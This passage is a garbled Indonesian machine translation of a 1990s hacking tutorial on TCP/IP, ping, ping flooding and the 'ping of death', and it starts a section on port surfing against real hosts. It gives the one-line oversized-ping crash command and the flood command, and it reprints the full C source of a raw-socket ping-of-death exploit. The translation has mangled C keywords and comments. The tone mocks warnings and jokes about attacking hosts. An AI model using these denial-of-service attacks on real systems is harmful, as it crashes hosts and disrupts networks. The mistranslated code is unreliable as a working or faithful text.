mau tau banget. Jadi jika Anda ingin mengetahui cara mengamankan sistem Linux Anda, atau apakah Anda harus datang
melintasi salah satu dari banyak ISP yang menggunakan Linux dan ingin menjelajah (oops, lupakan saya
menulis itu), di sinilah Anda dapat pergi untuk info:
ftp://info.cert.org/pub/cert_advisories/CA -94: 01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
http://bach.cis.temple.edu/linux/linux-security/
http://www.geek-girl.com/bugtraq/
Ada juga bantuan untuk pengguna Linux di Internet Relay Chat (IRC). Ben (cyberkid@usa.net)
host saluran yang disebut #LinuxHelp di server IRC Undernet.
Terakhir tetapi tidak kalah pentingnya, jika Anda ingin mengajukan pertanyaan Linux pada daftar Happy Hacker, Anda
dipersilakan. Kita mungkin
orang buta menuntun orang buta, tetapi apa
sih!
____________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 2 Angka 3
Pengantar TCP / IP. Itu artinya paket! Datagram! Ping membesar-besarkan paket denial of exploit of service
dijelaskan. Tapi retas ini jauh lebih berbahaya daripada kebanyakan. Jangan coba ini di rumah ...
____________________________________________________________
Jika Anda telah berada di daftar Happy Hacker untuk sementara waktu, Anda telah mendapatkan beberapa item yang diteruskan
dari menu
Daftar Bugtraq pada eksploitasi paket ping baru.
Sekarang, jika ini kedengarannya seperti omong kosong bagimu, santai saja. Ini benar-benar sangat sederhana. Bahkan, itu sangat
sederhana
jika Anda menggunakan Windows 95, pada saat Anda menyelesaikan artikel ini Anda akan mengetahui perintah sederhana, satu-
baris itu
Anda dapat menggunakannya untuk merusak banyak host dan router Internet.
***********************************************
ANDA BISA PERGI KE PERINGATAN JAIL: Kali ini saya tidak akan memohon pada tipe jenius jahat wannabe
daftar ini berbudi luhur dan tahan godaan untuk menyalahgunakan informasi yang akan saya berikan kepada mereka. Lihat
apakah saya
peduli! Jika salah satu dari mereka ketahuan menghancurkan ribuan host dan router Internet, tidak hanya mereka
masuk penjara dan denda besar. Kita semua akan berpikir dia bodoh. Eksploitasi ini adalah perintah no-brainer, one-line
dari Windows 95. Ya, sistem operasi yang dirancang untuk orang bodoh yang tidak mengerti. Jadi tidak ada yang elit
tentang peretasan ini. Apa yang elit mampu menggagalkan serangan ini.
************************************************
************************************************
CATATAN NEWBIE: Jika paket, datagram, dan TCP / IP belum benar-benar teman dekat Anda, percayalah, Anda
harus benar-benar tidur dengan mereka untuk menyebut diri Anda seorang hacker. Jadi tunggu di sini untuk beberapa hal teknis.
Kapan

Halaman 125
Jika sudah selesai, Anda akan puas mengetahui bahwa Anda dapat membuat kekacauan di Internet, tetapi terlalu elit
untuk melakukannya.
Paket adalah cara untuk mengirim informasi secara elektronik yang mencegah kesalahan. Idenya adalah bahwa tidak ada
transmisi
teknologi sempurna. Pernahkah Anda memainkan game "telepon"? Anda mendapatkan selusin orang dalam satu lingkaran
dan orang pertama membisikkan pesan ke orang kedua. Sesuatu seperti "Sanggul adalah bentuk terendah dari
gandum. "Orang kedua berbisik kepada yang ketiga," Gelandangan adalah bentuk kecurangan terendah. "Yang ketiga
Bisik, "Rum adalah bentuk terendah dari
minum. "Dan seterusnya. Sangat menyenangkan untuk mengetahui seberapa jauh pesan tersebut dapat bermutasi saat berjalan di
sekitar lingkaran.
Tetapi ketika, misalnya, Anda mendapatkan email, Anda lebih suka bahwa itu tidak kacau. Jadi komputer yang mengirim
email memecahnya menjadi potongan-potongan kecil yang disebut datagram. Kemudian membungkus hal-hal di sekitar setiap
datagram yang memberitahu
apa
komputer harus pergi ke, dari mana asalnya, dan memeriksa apakah datagram mungkin
kacau. Paket datagram terbungkus ini disebut "paket."
Sekarang jika komputer mengirim email kepada Anda untuk mengemas pesan yang sangat panjang menjadi hanya satu paket,
kemungkinannya cukup tinggi sehingga akan kacau saat dalam perjalanan ke komputer lain. Sedikit bersendawa. Jadi ketika
komputer penerima memeriksa paket dan menemukan bahwa itu kacau, itu
akan membuangnya dan memberi tahu komputer lain untuk mengirimnya kembali. Butuh waktu lama hingga paket raksasa ini
melewati utuh.
Tetapi jika pesan tersebut dipecah menjadi banyak potongan kecil dan dibungkus menjadi banyak paket, sebagian besar dari
mereka
akan baik dan komputer penerima akan menyimpannya. Ini kemudian akan memberitahu komputer pengirim untuk mengirim
ulang
hanya paket-paket yang berantakan. Kemudian ketika semua bagian akhirnya sampai di sana, komputer penerima meletakkannya
bersama-sama dalam urutan yang benar dan lihatlah, ada email lengkap dan bebas kesalahan.
TCP / IP adalah singkatan dari Transmission Control Protocol / Internet Protocol. Ini memberitahu komputer yang terhubung
Internet bagaimana mengemas pesan ke dalam paket dan cara membaca paket dari paket lain ini
komputer. Ping menggunakan TCP / IP untuk membuat paket-paketnya.
********************************************
"Ping" adalah perintah yang mengirimkan perasa dari komputer Anda ke komputer lain untuk melihat apakah itu dinyalakan
dan terhubung ke jaringan yang sama dengan tempat Anda berada. Di Internet ada sekitar sepuluh juta komputer yang Anda
miliki
bisa ping.
Ping adalah perintah yang dapat Anda berikan, misalnya, dari operasi Unix, Windows 95 dan Windows NT
sistem. Ini adalah bagian dari Internet Control Message Protocol (ICMP), yang digunakan untuk memecahkan masalah TCP / IP
jaringan. Apa yang dilakukannya adalah memberi tahu komputer jarak jauh untuk mengulang kembali ping. Jadi, jika Anda
mendapatkan ping Anda
kembali, Anda tahu komputer itu hidup. Selain itu, beberapa bentuk perintah ping juga akan memberi tahu Anda caranya
butuh waktu lama untuk mengirim pesan ke komputer itu dan kembali lagi.
Tetapi bagaimana komputer Anda tahu bahwa ping yang baru saja dikirim benar-benar kembali dari target
komputer? Datagram adalah jawabannya. Ping mengirim datagram. Jika ping yang kembali memegang ini sama
datagram, Anda tahu itu ping Anda yang baru saja menggema.
Format dasar dari perintah ini adalah:
ping nama host
di mana "hostname" adalah alamat Internet dari komputer yang ingin Anda periksa.
Ketika saya memberikan perintah ini dari Sun Release 4.1 Unix, saya mendapatkan jawaban "nama host masih hidup."

Halaman 126
************************************
TIP TEKNIS: Karena kekuatan destruktif dari ping, banyak Penyedia Layanan Internet menyembunyikan ping
program di akun shell mereka di mana pemula yang tidak mengerti tidak bisa mendapatkannya. Jika akun shell Anda mengatakan
"command not found" ketika Anda memasukkan perintah ping, coba:
/ usr / etc / ping nama host
Jika ini tidak berhasil, cobalah perintah "whereis ping" atau komplain ke dukungan teknis ISP Anda. Mereka
mungkin telah menonaktifkan ping untuk pengguna biasa, tetapi jika Anda meyakinkan dukungan teknis Anda adalah warga
negara Internet yang baik
mereka mungkin membiarkan Anda menggunakannya.
***************************************
**************************************
NEWBIE NOTE: Anda bilang tidak bisa menemukan cara untuk melakukan ping dari layanan online Anda? Itu mungkin karena
kamu
tidak memiliki akun shell. Tapi ada satu hal yang benar-benar Anda butuhkan untuk meretas: AKUN SHELL !!!!
Alasan peretas mengolok-olok orang-orang dengan akun America Online adalah karena ISP itu tidak memberi
akun shell. Ini karena America Online ingin Anda menjadi anak laki-laki dan perempuan yang baik dan tidak hack!
"Akun shell" adalah akun Internet di mana komputer Anda menjadi terminal salah satu ISP Anda
komputer host. Setelah Anda berada di "shell" Anda dapat memberikan perintah ke sistem operasi (yang
biasanya Unix) saja
seperti Anda sedang duduk di sana di konsol salah satu host ISP Anda.
Anda mungkin sudah memiliki akun shell tetapi tidak tahu cara masuk ke sana. Hubungi dukungan teknis dengan ISP Anda
untuk mengetahui apakah Anda memilikinya, dan bagaimana cara mendapatkannya.
***************************************
Ada segala macam variasi mewah pada perintah ping. Dan, coba tebak, setiap kali ada perintah
Anda memberi melalui Internet yang memiliki banyak variasi, Anda dapat mengandalkan ada sesuatu
diretas di sana. Muhahaha!
Ping banjir adalah contoh sederhana. Jika sistem operasi Anda akan membiarkan Anda memberikan perintah:
-> ping -f nama host
itu mengirimkan banyak ping, secepat mesin host ISP Anda bisa membuatnya. Ini membuat
host yang sudah Anda targetkan, begitu sibuk menyuarakan kembali ping Anda, sehingga bisa melakukan sedikit hal lain. Ini
juga menempatkan beban berat
jaringan.
Peretas dengan tingkat keterampilan primitif terkadang akan berkumpul dan menggunakan beberapa komputer sekaligus
secara bersamaan ping komputer host Internet beberapa korban. Ini umumnya akan menjaga komputer korban juga
sibuk melakukan hal lain. Bahkan mungkin crash. Namun, sisi bawahnya (dari sudut pandang penyerang) adalah itu
itu membuat komputer penyerang diikat juga.
************************************
CATATAN NETIQUETTE: Banjir ping komputer sangat kasar. Ketahuan melakukan ini dan Anda akan
beruntung jika hal terburuk yang terjadi adalah penyedia layanan online Anda menutup akun Anda. Lakukan ini dengan serius
hacker dan Anda mungkin perlu transplantasi identitas.
Jika Anda harus memulai jenis ping banjir secara tidak sengaja, Anda dapat mematikannya dengan menahan tombol kontrol dan
menekan "c" (kontrol-c).
************************************

Halaman 127
*************************************
TIP GENIUS JAHAT: Ping sendiri! Jika Anda menggunakan semacam Unix, sistem operasi Anda akan membiarkan Anda
menggunakannya
komputer Anda melakukan apa saja untuk dirinya sendiri yang dapat dilakukan untuk komputer lain. Alamat jaringan
itu membawamu
kembali ke komputer host Anda adalah localhost (atau 127.0.0.1). Berikut ini contoh bagaimana saya menggunakan localhost:
<slug> [65] -> telnet localhost
Mencoba 127.0.0.1 ...
Terhubung ke localhost.
Karakter melarikan diri adalah '^]'.
SunOS UNIX (siput)
masuk:
Lihat, saya kembali ke urutan login untuk komputer bernama "slug" di seluruh
lagi.
Sekarang saya ping sendiri:
<llama> [68] -> / usr / etc / ping localhost
localhost masih hidup
Ini memberikan hasil yang sama seperti jika saya akan memerintahkan:
<llama> [69] -> / usr / etc / ping llama
llama.swcp.com hidup
**************************************
*****************************************
TIP MUHAHAHA: Ingin menarik rantai seseorang? Katakan padanya untuk ftp ke 127.0.0.1 dan masuk menggunakan nya
nama pengguna dan kata sandi sendiri untuk kewl warez! Mantan suamiku Keith Henson melakukan itu di Gereja St.
Scientology. COGs ditingkatkan ke 127.0.0.1 dan menemukan semua tulisan suci yang memiliki hak cipta. Mereka
menganggap ini di komputer Keith, bukan milik mereka. Mereka begitu yakin dia memiliki tulisan suci mereka
membawanya ke pengadilan. Hakim, ketika dia menyadari mereka hanya kembali ke komputer mereka sendiri, secara harfiah
menertawakan mereka di luar pengadilan.
Untuk transkrip lucu atau rekaman audio dari sesi pengadilan yang terkenal ini, email hkhenson@cup.portal.com.
Itu alamat email Keith. Topi saya cocok untuk peretas hebat!
*******************************************
Namun, eksploit paket ping yang terlalu besar yang akan Anda pelajari akan semakin merusak beberapa host
dari geng komplotan ping banjir. Dan itu akan melakukannya tanpa mengikat komputer penyerang
lebih lama dari sepersekian detik yang dibutuhkan untuk mengirim hanya satu ping.
Cara termudah untuk melakukan peretasan ini adalah dengan menjalankan Windows 95. Tidak memilikinya? Anda biasanya
dapat menemukan El Cheapo
toko yang akan menjualnya kepada Anda untuk $ 99.
Untuk melakukan ini, pertama mengatur sistem Windows 95 Anda sehingga Anda dapat membuat koneksi PPP atau SLIP dengan
Internet menggunakan program Jaringan Dialup di bawah ikon My Computer. Anda mungkin butuh bantuan
dukungan teknis ISP Anda dalam mengatur ini. Anda harus melakukannya dengan cara ini atau retasan ini tidak akan berfungsi.
Amerika Anda
Dialer online * pasti * tidak akan berfungsi.

Halaman 128
**********************************
NEWBIE CATATAN: Jika koneksi Internet Anda memungkinkan Anda untuk menjalankan browser Web yang menampilkan
gambar, Anda bisa
gunakan nomor dialup itu dengan program Windows 95 Dialup Networking Anda untuk mendapatkan PPP atau SLIP
koneksi.
**********************************
Selanjutnya, dapatkan koneksi Anda ke Internet. Tapi jangan jalankan browser atau apa pun. Sebagai gantinya, sekali Dialup
Anda
Program jaringan memberi tahu Anda bahwa Anda memiliki koneksi, klik tombol "Start" dan buka daftar
"MS-DOS." Buka jendela DOS ini. Anda akan mendapatkan prompt:
C: \ windows \>
Sekarang mari kita lakukan ini dengan cara warga negara yang baik. Pada prompt ini Anda bisa mengetikkan "ping" biasa-biasa
saja
perintah:
C: \ windows \ ping nama host
di mana "hostname" adalah alamat beberapa komputer Internet. Misalnya, Anda dapat melakukan ping ke thales.nmia.com,
yang merupakan salah satu komputer favorit saya, dinamai setelah filsuf Yunani yang tidak dikenal.
Sekarang, jika Anda mengetahui alamat salah satu komputer Saddam Hussein, Anda bisa melakukannya
ingin memberi perintah:
c: \ windows \ ping -l 65510 saddam_hussein's.computer.mil
Sekarang jangan benar-benar melakukan ini ke komputer nyata! Beberapa, tetapi tidak semua, komputer akan macet dan entah
tetap digantung atau
reboot ketika mereka mendapatkan ping ini. Yang lain akan terus bekerja dengan riang, dan kemudian tiba-tiba tenggelam
beberapa jam kemudian.
Mengapa? Tambahan yang ditambahkan -l 65510 menciptakan datagram raksasa untuk paket ping. Beberapa komputer, saat
ditanya
untuk mengirim kembali datagram identik, benar-benar kacau.
Jika Anda ingin semua detail berdarah pada eksploitasi ping ini, termasuk cara melindungi komputer Anda darinya, periksa
di luar
http://www.sophist.demon.co.uk/ping.
Sekarang ada cara lain untuk membuat ping datagram raksasa selain menggunakan Windows 95. Misalnya, jika
Anda menjalankan Unix FreeBSD atau Linux versi tertentu pada PC Anda, Anda dapat menjalankan program ini, yang telah
diposting
ke daftar Bugtraq.
Dari: Bill Fenner <fenner@freefall.freebsd.org>
Kepada: Beberapa penerima daftar BUGTRAQ <BUGTRAQ@netspace.org>
Subjek: Program exploit Ping
Karena beberapa orang tidak perlu memiliki kotak Windows '95 di sekitar, saya (Fenner) menulis sebagai berikut
mengeksploitasi program. Ini membutuhkan lapisan soket mentah yang tidak mengacaukan paket, jadi BSD 4.3, SunOS dan
Solaris adalah
di luar. Ini berfungsi dengan baik pada sistem 4.4BSD. Ini harus bekerja di Linux jika Anda kompilasi dengan -
DREALLY_RAW.
Jangan ragu untuk melakukan ini dengan apa yang Anda inginkan. Silakan gunakan alat ini hanya untuk menguji mesin Anda
sendiri, dan bukan untuk
crash orang lain.
* win95ping.c
*

Halaman 129
* Simulasikan win95 jahat "ping-l 65510 buggyhost".
* versi 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996
*
* Ini membutuhkan soket mentah yang tidak mengacaukan paket sama sekali (lainnya
* daripada menambahkan checksum). Itu berarti bahwa SunOS, Solaris, dan
* Sistem berbasis BSD4.3 sedang tidak aktif. Sistem BSD4.4 (FreeBSD, NetBSD,
* OpenBSD, BSDI) akan berfungsi. Linux mungkin berfungsi, saya tidak punya Linux
* Sistem untuk mencobanya.
*
* Serangan dari kotak Win95 terlihat seperti:
* 17: 26: 11.013622 cslwin95> arkroyal: icmp: echo request (frag 6144: 1480 @ 0 +)
* 17: 26: 11.015079 cslwin95> bahtera: (frag 6144: 1480 @ 1480 +)
* 17: 26: 11.016637 cslwin95> Arkarkal: (frag 6144: 1480 @ 2960 +)
* 17: 26: 11.017577 cslwin95> Arkarkal: (frag 6144: 1480 @ 4440 +)
* 17: 26: 11.018833 cslwin95> Arkarkal: (frag 6144: 1480 @ 5920 +)
* 17: 26: 11.020112 cslwin95> bahtera: (frag 6144: 1480 @ 7400 +)
* 17: 26: 11.021346 cslwin95> arkroyal: (frag 6144: 1480 @ 8880 +
* 17: 26: 11.022641 cslwin95> bahtera: (frag 6144: 1480 @ 10360 +)
* 17: 26: 11.023869 cslwin95> bahtera: (frag 6144: 1480 @ 11840 +)
* 17: 26: 11.025140 cslwin95> bahtera: (frag 6144: 1480 @ 13320 +)
* 17: 26: 11.026604 cslwin95> Arkarkal: (frag 6144: 1480 @ 14800 +)
* 17: 26: 11.027628 cslwin95> Arkarkal: (frag 6144: 1480 @ 16280 +)
* 17: 26: 11.028871 cslwin95> arkroyal: (frag 6144: 1480 @ 17760 +)
* 17: 26: 11.030100 cslwin95> bahtera: (frag 6144: 1480 @ 19240 +)
* 17: 26: 11.031307 cslwin95> Arkarkal: (frag 6144: 1480 @ 20720 +)
* 17: 26: 11.032542 cslwin95> bahtera: (frag 6144: 1480 @ 22200 +)
* 17: 26: 11.033774 cslwin95> Arkarkal: (frag 6144: 1480 @ 23680 +)
* 17: 26: 11.035018 cslwin95> arkroyal: (frag 6144: 1480 @ 25160 +)
* 17: 26: 11.036576 cslwin95> Arkroyal: (frag 6144: 1480 @ 26640 +)
* 17: 26: 11.037464 cslwin95> Arkarkal: (frag 6144: 1480 @ 28120 +)
* 17: 26: 11.038696 cslwin95> Arkarkal: (frag 6144: 1480 @ 29600 +)
* 17: 26: 11.039966 cslwin95> bahtera: (frag 6144: 1480 @ 31080 +)
* 17: 26: 11.041218 cslwin95> bahtera: (frag 6144: 1480 @ 32560 +)
* 17: 26: 11.042579 cslwin95> bahtera: (frag 6144: 1480 @ 34040 +)
* 17: 26: 11.043807 cslwin95> Arkarkal: (frag 6144: 1480 @ 35520 +)
* 17: 26: 11.046276 cslwin95> bahtera: (frag 6144: 1480 @ 37000 +)
* 17: 26: 11.047236 cslwin95> Arkarkal: (frag 6144: 1480 @ 38480 +)
* 17: 26: 11.048478 cslwin95> Arkarkal: (frag 6144: 1480 @ 39960 +)
* 17: 26: 11.049698 cslwin95> Arkarkal: (frag 6144: 1480 @ 41440 +)
* 17: 26: 11.050929 cslwin95> Arkarkal: (frag 6144: 1480 @ 42920 +)
* 17: 26: 11.052164 cslwin95> arkroyal: (frag 6144: 1480 @ 44400 +)
* 17: 26: 11.053398 cslwin95> bahtera: (frag 6144: 1480 @ 45880 +)
* 17: 26: 11.054685 cslwin95> Arkarkal: (frag 6144: 1480 @ 47360 +)
* 17: 26: 11.056347 cslwin95> Arkarkal: (frag 6144: 1480 @ 48840 +)
* 17: 26: 11.057313 cslwin95> Arkarkal: (frag 6144: 1480 @ 50320 +)
* 17: 26: 11.058357 cslwin95> Arkarkal: (frag 6144: 1480 @ 51800 +)
* 17: 26: 11.059588 cslwin95> bahtera: (frag 6144: 1480 @ 53280 +)
* 17: 26: 11.060787 cslwin95> arkroyal: (frag 6144: 1480 @ 54760 +)
* 17: 26: 11.062023 cslwin95> bahtera: (frag 6144: 1480 @ 56240 +)
* 17: 26: 11.063247 cslwin95> bahtera: (frag 6144: 1480 @ 57720 +)
* 17: 26: 11.064479 cslwin95> bahtera: (frag 6144: 1480 @ 59200 +)
* 17: 26: 11.066252 cslwin95> Arkarkal: (frag 6144: 1480 @ 60680 +)
* 17: 26: 11.066957 cslwin95> Arkarkal: (frag 6144: 1480 @ 62160 +)

Halaman 130
* 17: 26: 11.068220 cslwin95> bahtera: (frag 6144: 1480 @ 63640 +)
* 17: 26: 11.069107 cslwin95> Arkarkal: (frag 6144: 398 @ 65120)
*
*/
#termasuk <stdio.h>
#termasuk <sys / types.h>
#termasuk <sys / socket.h>
#termasuk <netdb.h>
#termasuk <netinet / in.h>
#termasuk <netinet / in_systm.h>
#termasuk <netinet / ip.h>
#termasuk <netinet / ip_icmp.h>
/*
* Jika kernel Anda tidak bercampur dengan paket-paket mentah, # tentukan REALLY_RAW.
* Ini mungkin hanya Linux.
*/
#ifdef REALLY_RAW
# tentukan FIX (x) htons (x)
#lain
#define FIX (x) (x)
#berakhir jika
int
main (int argc, char ** argv)
{
int;
char buf [1500];
struct ip * ip = (struct ip *) buf;
struct icmp * icmp = (struct icmp *) (ip + 1);
host host * hp;
struct sockaddr_in dst;
offset int;
int pada = 1;
bzero (buf, sizeof buf);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_IP)) <0) {
perror ("socket");
keluar (1);
}
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, & on, sizeof (on)) <0) {
perror ("IP_HDRINCL");
keluar (1);
}
if (argc! = 2) {
fprintf (stderr, "use:% s hostname \ n", argv [0]);
keluar (1);
}
if ((hp = gethostbyname (argv [1])) == NULL) {
if ((ip-> ip_dst.s_addr = inet_addr (argv [1])) == -1) {
fprintf (stderr, "% s: host tidak dikenal \ n", argv [1]);
}
} lain {

Halaman 131
bcopy (hp-> h_addr_list [0], & ip-> ip_dst.s_addr, hp-> h_length);
}
printf ("Mengirim ke% s \ n", inet_ntoa (ip-> ip_dst));
ip-> ip_v = 4;
ip-> ip_hl = sizeof * ip >> 2;
ip-> ip_tos = 0;
ip-> ip_len = FIX (sizeof buf);
ip-> ip_id = htons (4321);
ip-> ip_off = FIX (0);
ip-> ip_ttl = 255;
ip-> ip_p = 1;
ip-> ip_sum = 0;
/ * kernel terisi *
ip-> ip_src.s_addr = 0; / * kernel terisi *
dst.sin_addr = ip-> ip_dst;
dst.sin_family = AF_INET;
icmp-> icmp_type = ICMP_ECHO;
icmp-> icmp_code = 0;
icmp -> icmp_cksum = htons (~ (ICMP_ECHO << 8));
/ * checksum dari semua 0 mudah dihitung * /
untuk (offset = 0; offset <65536; offset + = (sizeof buf - sizeof * ip)) {
ip-> ip_off = FIX (offset >> 3);
jika (offset <65120)
ip-> ip_off | = FIX (IP_MF);
lain
ip-> ip_len = FIX (418); / * membuat total 65538 * /
if (sendto (s, buf, sizeof buf, 0, (struct sockaddr *) & dst,
sizeof dst) <0) {
fprintf (stderr, "offset% d:", offset);
perror ("sendto");
}
if (offset == 0) {
icmp -> icmp_type = 0;
icmp -> icmp_code = 0;
icmp -> icmp_cksum = 0;
}
}
}
(Akhir dari pesan eksploitasi ping Fenner.)
******************************************
ANDA BISA PERGI KE JAIL CATATAN: Peretasan ini bukan hanya elit, jika Anda membaca ini, Anda tidak cukup tahu
agar tidak tertangkap melakukan ping hack ini. Di sisi lain, jika Anda melakukannya ke Internet
tuan rumah di Irak ...
******************************************
Tentu saja ada banyak hal lain yang bisa Anda lakukan dengan ping. Jika Anda memiliki akun shell, Anda dapat menemukannya
keluar banyak orang bodoh tentang ping dengan memberikan perintah:
pria ping

Halaman 132
Bahkan, Anda bisa mendapatkan banyak detail pada perintah Unix apa pun dengan "man."
Bersenang-senang dengan ping - dan jadilah baik! Tapi ingat, aku tidak memohon wannabes genius jahat untuk menjadi baik.
Lihat
jika saya peduli ketika Anda tertangkap ...
____________________________________________________________
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 2 Angka 4
Lebih intro ke TCP / IP: port surfing! Daemon! Cara mendapatkan hampir semua komputer tanpa masuk dan
tanpa melanggar hukum. Kesan teman-teman Anda yang tidak tahu apa-apa dan temukan kewl, legal, dan aman.
____________________________________________________________
Beberapa hari yang lalu saya mengunjungi seorang teman wanita. Dia berusia 42 tahun dan tidak memiliki komputer. Namun, dia
mengambil
kelas di komputer pribadi di community college. Dia ingin tahu apa semua peretasan ini
tentang. Jadi saya memutuskan untuk memperkenalkannya ke port surfing. Dan saat melakukannya, kami menemukan sesuatu
kewl.
Port surfing memanfaatkan struktur TCP / IP. Ini adalah protokol (seperangkat aturan) yang digunakan untuk
komputer untuk berbicara satu sama lain melalui Internet. Salah satu prinsip dasar Unix (yang paling populer
sistem operasi di Internet) adalah untuk menetapkan "port" untuk setiap fungsi yang mungkin diperintahkan satu komputer
lain untuk tampil. File contoh yang umum adalah mengirim dan menerima email, baca Usenet newsgroup, telnet,
mentransfer file, dan menawarkan halaman Web.
************************
Catatan pemula # 1: Port komputer adalah tempat informasi masuk atau keluar. Di komputer rumah Anda,
contoh port adalah monitor Anda, yang mengirimkan informasi, keyboard dan mouse Anda, yang mengirim
informasi masuk, dan modem Anda, yang mengirimkan informasi keluar dan masuk.
Tetapi komputer host Internet seperti callisto.unm.edu memiliki lebih banyak port daripada komputer di rumah.
Port-port ini diidentifikasi oleh angka. Sekarang ini tidak semua port fisik, seperti keyboard atau serial RS232
port (untuk modem Anda). Mereka adalah port (perangkat lunak) virtual.
"Layanan" adalah program yang berjalan di "port." Ketika Anda melakukan telnet ke port, program itu sudah berjalan dan
berjalan,
tinggal menunggu input Anda. Selamat melakukan peretasan!
************************
Jadi jika Anda ingin membaca halaman Web, browser Anda menghubungi nomor port 80 dan memberitahu komputer itu
mengelola situs Web itu untuk membiarkan Anda masuk. Dan, tentu saja, Anda masuk ke komputer server Web tanpa
kata sandi.
OK, masalah besar. Itu standar untuk Internet. Banyak - kebanyakan - komputer di Internet akan membiarkan Anda
melakukan beberapa hal dengan mereka tanpa perlu kata sandi,
Namun, esensi dari peretasan adalah melakukan hal-hal yang tidak jelas. Itu tidak hanya melompat pada Anda dari
manual. Salah satu cara Anda dapat naik selangkah dari menjalankan pengguna komputer pabrik adalah belajar cara port
berselancar.
Inti dari penjelajahan port adalah memilih komputer target dan menjelajahinya untuk melihat port apa yang terbuka dan
apa yang dapat Anda lakukan dengan mereka.

Halaman 133
Sekarang jika Anda adalah peretas malas, Anda dapat menggunakan alat peretas kalengan seperti Setan atau Netcat. Ini adalah
program
Anda dapat menjalankan dari Linux, FreeBSD atau Solaris (semua jenis Unix) dari PC Anda. Mereka secara otomatis memindai
komputer target. Mereka akan memberi tahu Anda port apa yang sedang digunakan. Mereka juga akan menyelidiki port ini untuk
keberadaan
daemon dengan kelemahan keamanan, dan memberi tahu Anda apa itu.
********************************
Catatan pemula # 2: Daemon bukanlah sejenis grinch atau gremlin atau pria 666. Ini adalah program yang berjalan di Internet
latar belakang pada banyak (tetapi tidak semua) port sistem Unix. Itu menunggu Anda untuk datang dan menggunakannya. Jika
Anda menemukan
daemon di port, itu mungkin bisa diretas. Beberapa alat peretas akan memberi tahu Anda tentang fitur yang dapat diretas
daemon yang mereka deteksi.
********************************
Namun, ada beberapa alasan untuk menjelajahi pelabuhan dengan tangan alih-alih secara otomatis.
1) Anda akan belajar sesuatu. Probing secara manual Anda mendapatkan firasat bagaimana daemon berjalan pada port itu
berperilaku. Ini perbedaan antara menonton film dengan rating x dan (blush).
2) Anda dapat mengesankan teman-teman Anda. Jika Anda menjalankan alat peretas kalengan seperti Setan, teman Anda akan
melihat Anda dan
katakan, "Masalah besar. Saya juga bisa menjalankan program. ”Mereka akan segera menangkap rahasia kecil si hacker yang
kotor
dunia. Sebagian besar eksploitasi peretasan hanya menjalankan program yang mereka ambil dari beberapa situs BBS atau ftp.
Tapi
jika Anda memasukkan perintah keystroke dengan keystroke mereka akan melihat Anda menggunakan otak Anda. Dan Anda
dapat membantu mereka
bermain dengan daemon, juga, dan berikan mereka dorongan besar.
3) Peretas yang benar-benar elit menjelajahi port dan bermain dengan daemon dengan tangan karena itu adalah satu-satunya cara
untuk menemukannya
sesuatu yang baru. Hanya ada beberapa ratus peretas - paling banyak - yang menemukan orang baru. Sisanya adil
jalankan eksploitasi kalengan berulang-ulang. Membosankan. Tetapi saya sedang mengajari Anda cara mencapai puncak
dari hackerdom.
Sekarang izinkan saya memberi tahu Anda apa yang saya dan teman paruh baya saya temukan hanya bermain-main. Pertama,
kami memutuskan kami
tidak ingin membuang waktu kita bermain-main dengan komputer host kecil kecil. Hei, mari kita pergi untuk yang besar!
Jadi bagaimana Anda menemukan komputer kahuna besar di Internet? Kami mulai dengan domain yang terdiri dari a
LAN PC yang menjalankan Linux yang kebetulan sudah saya ketahui, yang digunakan oleh Internet New Mexico
Akses ISP: nmia.com.
*******************************
Newbie Note # 3: Domain adalah alamat Internet. Anda dapat menggunakannya untuk mencari siapa yang menjalankan
komputer yang digunakan
oleh domain, dan juga untuk mencari tahu bagaimana domain itu terhubung ke Internet.
*******************************
Jadi untuk melakukan ini, pertama-tama kita masuk ke akun shell saya dengan Southwest Cyberport. Saya memberi perintah:
<slug> [66] -> whois nmia.com
Akses Internet New Mexico (NMIA-DOM)
2201 Buena Vista SE
Albuquerque, NM 87106
Nama Domain: NMIA.COM
Kontak Administratif, Kontak Teknis, Kontak Zona:
Orrell, Stan (SO11) SAO@NMIA.COM
(505) 877-0617
Rekam terakhir diperbarui pada 11-Mar-94.

Halaman 134
Rekor dibuat pada 11-Mar-94.
Server domain dalam urutan yang tercantum:
NS.NMIA.COM
198.59.166.10
GRANDE.NM.ORG
129.121.1.2
Sekarang ini taruhan yang bagus bahwa grande.nm.org melayani banyak host Internet lain di samping nmia.com. Begini caranya
kami port menjelajahi cara kami untuk mengetahui hal ini:
<slug> [67] -> telnet grande.nm.org 15
Mencoba 129.121.1.2 ...
Terhubung ke grande.nm.org.
Karakter melarikan diri adalah '^]'.
TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1
Produk
Tanggal Kedaluwarsa Otorisasi Lisensi
----------
------- ------------- ---------------
MULTINET
Ya A-137-1641
(tidak ada)
NFS-CLIENT
Ya A-137-113237 (tidak ada)
*** Konfigurasi untuk file "MULTINET: NETWORK_DEVICES.CONFIGURATION" ***
Alat
Bendera Alamat CSR Adaptor / Vektor
------
------- ----------- ------------
se0 (Shared VMS Ethernet / FDDI) -NONE- -NONE- -NONE-
Koneksi MultiNet Aktif, termasuk server:
Proto Rcv-Q Snd-Q Alamat Lokal (Port) Alamat Asing (Port) Negara
----- ----- ----- ------------------ ----------------- - -----
TCP 0 822 GRANDE.NM.ORG (NETSTAT) 198.59.115.24 (1569) DIDIRIKAN
TCP 0 0 GRANDE.NM.ORG (POP3) 164.64.201.67 (1256) DIDIRIKAN
TCP 0 0 GRANDE.NM.ORG (4918) 129.121.254.5 (TELNET) DIDIRIKAN
TCP 0 0 GRANDE.NM.ORG (TELNET) AVATAR.NM.ORG (3141) DIDIRIKAN
TCP 0 0 * (NAMESERVICE) * (*)
MENDENGARKAN
TCP 0 0 * (TELNET)
* (*)
MENDENGARKAN
TCP 0 0 * (FTP)
* (*)
MENDENGARKAN
TCP 0 0 * (JARI)
* (*)
MENDENGARKAN
TCP 0 0 * (NETSTAT)
* (*)
MENDENGARKAN
TCP 0 0 * (SMTP)
* (*)
MENDENGARKAN
TCP 0 0 * (LOGIN)
* (*)
MENDENGARKAN
TCP 0 0 * (SHELL)
* (*)
MENDENGARKAN
TCP 0 0 * (EXEC)
* (*)
MENDENGARKAN
TCP 0 0 * (RPC)
* (*)
MENDENGARKAN
TCP 0 0 * (NETCONTROL)
